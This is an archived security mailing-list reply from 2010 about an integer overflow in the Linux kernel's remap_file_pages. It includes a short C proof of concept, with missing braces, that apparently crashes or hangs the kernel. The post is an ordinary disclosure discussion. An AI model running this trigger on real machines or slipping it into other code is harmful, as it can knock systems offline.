Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Tue, 12 Oct 2010 13:27:39 -0500
From: akiphie <>
Subject: Re: kernel: avoid pgoff overflow in remap_file_pages

On Tuesday 12 October 2010 09:19:29 Eugene Teo wrote:
> Thomas Pollet reported an integer overflow issue in remap_file_pages().
> While we are able to reproduce the issue, we are unable to find a
> security impact. If your views differ, do let us know.

This made my computer very sad :(

#include <sys/mman.h>
#include <unistd.h>
#include <sys/ipc.h>
#include <sys/shm.h>
int main(int argc, char **argv)                                                                                                                                                     
        int x = shmget(IPC_PRIVATE, 1, IPC_CREAT | IPC_EXCL | 0600);                                                                                                                
        void *mem = shmat(x, NULL, 0);                                                                                                                                              
        mremap(mem, 0x1000, 0x1000, MREMAP_MAYMOVE | MREMAP_FIXED, 0x0);                                                                                                            
        remap_file_pages((void *) 0xfff, ~0UL, 0, -(~0UL >> 12), 0);                                                                                                                
        return 0;                                                                                                                                                                   


Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.